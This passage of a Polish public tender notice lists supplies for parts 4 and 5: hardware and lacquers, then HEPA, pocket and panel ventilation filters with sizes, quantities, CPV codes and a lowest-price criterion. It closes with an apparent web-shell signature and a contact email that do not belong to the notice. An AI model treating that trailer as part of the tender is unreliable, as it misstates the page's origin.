45	Kit elastyczny szklarski	10 kg
46	Zawias puszkowy meblowy	100 szt.
47	Klej montażowy	40 szt.
48	Lakier bezbarwny nitro	5 l
49	Lakier bezbarwny olejny	5 l
50	Miara zwijana 3m	10 szt.
51	Zawias kołkowy meblowy	100 szt.
52	Papier ścierny krążek przyczepny 36	100 szt.
53	Papier ścierny krążek przyczepny 60	100 szt.
54	Papier ścierny krążek przyczepny 80	100 szt.
55	Papier ścierny krążek przyczepny 100	100 szt.
56	Taśma antypoślizgowa samoprzylepna szer. 3cm	100 mb.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.91.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Filtry do urządzeń do wentylacji i klimatyzacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filtr absolutny H13 o wymiarach 475x475x78 wydajność do 600m3/h obudowa z blachy ocynkowanej, uszczelka od wlotu powietrza	1 szt.
2	Filtr absolutny H13 o wymiarach 575x575x78 wydajność do 970m3/h obudowa z blachy ocynkowanej, uszczelka od wlotu powietrza	20 szt.
3	Filtr absolutny H13 o wymiarach 610x305x292 nominalny strumień objętości 1000m3/h opór powietrza 253Pa, rama z blachy ocynkowanej, uszczelka od strony wlotu powietrza	6 szt.
4	Filtr absolutny H13 o wymiarach 575x575x78, rama z blachy ocynkowanej, uszczelka od strony wlotu powietrza	7 szt.
5	Filtr absolutny H13 o wymiarach 610x305x292 rama z blachy ocynkowanej, uszczelka od strony powietrza	12 szt.
6	Filtr absolutny H13 o wymiarach 457x457x78 rama z blachy ocynkowanej, uszczelka od strony powietrza	9 szt.
7	Filtr absolutny H13 o wymiarach 305x305x78 rama z blachy ocynkowanej, uszczelka od strony powietrza	4 szt.
8	Filtr absolutny H13 o wymiarach 610x610x78 rama z blachy ocynkowanej, uszczelka od strony powietrza	6 szt.
9	Filtr absolutny H13 o wymiarach 457x457x78 rama z blachy ocynkowanej, uszczelka od strony powietrza	8 szt.
FILTRY KIESZENIOWE - rama z blachy ocynkowanej
1	EU4 - 429x287x360 - 5 kieszeni	16 szt.
2	EU4 - 592x287x360 - 6 kieszeni	70 szt.
3	EU4 - 592x592x360 - 6 kieszeni	100 szt.
4	EU4 - 287x287x360 - 3 kieszenie	25 szt.
5	EU4 - 490x490x300 - 4 kieszenie	30 szt.
6	EU4 - 592x592x600 - 6 kieszeni	20 szt,
7	EU4 - 592x287x600 - 6 kieszeni	10 szt.
8	EU4 - 287x592x360 - 3 kieszenie	50 szt.
9	EU4 - 592x287x200 - 6 kieszeni	10 szt.
10	EU5 - 592x592x360 - 6 kieszeni	8 szt.
11	EU5 - 287x287x360 - 4 kieszenie	10 szt.
12	EU5 - 592x592x600 - 6 kieszeni	8 szt.
13	EU5 - 592x287x360 - 6 kieszeni	10 szt.
14	EU5 - 592x287x600 - 6 kieszeni	8 szt.
15	EU7 - 592x287x600 - 4 kieszenie	10 szt.
16	EU7 - 592x592x600 - 8 kieszeni	16 szt.
17	EU7 - 820x423x250 - 10 kieszeni	6 szt.
18	EU7 - 490x490x600 - 5 kieszeni	8 szt.
19	EU7 - 429x287x600 - 5 kieszeni	24 szt.
20	EU9 - 592x592x600 - 8 kieszeni	100 szt.
21	EU9 - 287x592x600 - 4 kieszenie	40 szt.
22	EU9 - 287x287x600 - 4 kieszenie	15 szt.
23	EU9 - 429x287x600 - 6 kieszeni	20 szt.
24	EU9 - 592x287x600 - 8 kieszeni	50 szt.
FILTRY KASETOWE
1	G3 - 590x492x50	10 szt.
2	G3 - 560x300x50	4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.91.35.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com